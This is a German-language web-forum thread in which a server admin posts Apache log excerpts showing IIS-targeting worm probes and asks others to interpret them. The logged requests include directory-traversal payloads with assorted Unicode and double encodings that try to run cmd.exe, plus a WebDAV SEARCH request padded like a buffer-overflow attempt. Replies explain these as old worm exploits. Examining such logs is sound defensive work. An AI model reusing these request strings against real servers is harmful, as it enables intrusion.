Webserver Logs

Ganto · 20. Dezember 2004

hi

mir ist aufgefallen, dass in den logdateien meines webservers häufig einträge wie unten gelistet auftauchen. bisher ist nichts schlimmes passiert, aber ich wollte trotzdem mal fragen, ob diese aufrufe eine gefahr sein könnten:

Code

62.219.250.81 - - [21/Nov/2004:05:10:22 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
62.219.250.81 - - [21/Nov/2004:05:10:22 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280
62.219.250.81 - - [21/Nov/2004:05:10:22 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
62.219.250.81 - - [21/Nov/2004:05:10:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
62.219.250.81 - - [21/Nov/2004:05:10:23 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
62.219.250.81 - - [21/Nov/2004:05:10:23 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
62.219.250.81 - - [21/Nov/2004:05:10:24 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
62.219.250.81 - - [21/Nov/2004:05:10:24 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337
62.219.250.81 - - [21/Nov/2004:05:10:25 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
62.219.250.81 - - [21/Nov/2004:05:10:25 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
62.219.250.81 - - [21/Nov/2004:05:10:25 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
62.219.250.81 - - [21/Nov/2004:05:10:26 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
62.219.250.81 - - [21/Nov/2004:05:10:26 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
62.219.250.81 - - [21/Nov/2004:05:10:27 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
62.219.250.81 - - [21/Nov/2004:05:10:27 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
62.219.250.81 - - [21/Nov/2004:05:10:27 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
...
83.117.56.126 - - [23/Nov/2004:19:51:37 +0100] "SEARCH /\x90\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02\uffff\x02
...
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 343

Alles anzeigen

gerade zweiteres sieht mir doch irgendwie nach einem bufferoverflow versuch aus. das ganze erstreckt sich über einige logfile seiten. das hier ist nur ein auszug. das system ist ein openbsd mit der eigenen apache implementation.

irgendwelche comments/erfahrungen zu dem thema?

ganto

chrlen · 21. Dezember 2004

Ja.

62.219.250.81: Mach dir keine Sorgen, das ist eine verwurmte Windowskisten.
83.117.56.126: Dies ist, so glaube ich, ein Exploit, welcher für IIS (oder ISS? ;)) konzipiert wurde. Stellt also auch keine Gefahr dar. (Bin mir jedoch nicht sicher, ob's wirklich der Exploit ist. Könnte auch ein WebDAV-Exploit sein sein..)

Du kannst die beiden IPs ja bei den entsprechenden Abuse-Officers melden.

Falls du dich mit regexp ein bisschen auskennst, kannst du ja einen Filter bauen.

Gruäss,
chrlen.

rediculum · 27. Dezember 2004

Zitat

Original von chrlen
62.219.250.81: Mach dir keine Sorgen, das ist eine verwurmte Windowskisten.

sieht aber auch nach einer attacke auf einen IIS aus. der versucht ein DOS fenster zu öffnen. diese log meldungen hab ich auch andauernd auf meinem apache. die sollen ruhig versuchen ein DOS fenster auf linux zu öffnen....

Arrhok · 1. Januar 2005

Hallo,

Das sind wie schon gesagt Attacken von Skript-Kiddies/Würmern die mit Exploits versuchen eine Kommandozeile auf deiner Kiste zu öffnen um dann irgendwelchen Unfug zu treiben.
Die GET's des ersten Rechners versuchen direkt über die cmd-Binary auf der Kiste zu wirken (geht seit IIS4.0 nur noch bei sehr dummen Sysops).
Das GET des zweiten Rechners benutzt einen älteren Exploit um deinen Rechner zu kompromiitieren.
Solange dein Rechner, bzw. dein IIS up-to-date sind musste dir vor solchen Attacken keine Sorgen machen. Die meisten stammen von irgendwelchen Skriptkiddies die sich neue FTPs für ihre FXP-Boards erhacken wollen und dabei ganze IP-Ranges nach Webservern (also Rechner die auf Port 80 listenen) suchen und bei Matches diese mit ihren Standart-Exploits füttern.

- Arrhok

Ganto · 3. Januar 2005

hehe, ms wird angegriffen, wo es nur geht

würde mich noch wunder nehmen, ob es auch solche "standard-attacken" gegen den apache gibt.

ganto

chrlen · 3. Januar 2005

Zitat

Original von Ganto
würde mich noch wunder nehmen, ob es auch solche "standard-attacken" gegen den apache gibt.

Gegen diverse PHP-Scripte gibt es das seit ein paar Tagen/Wochen.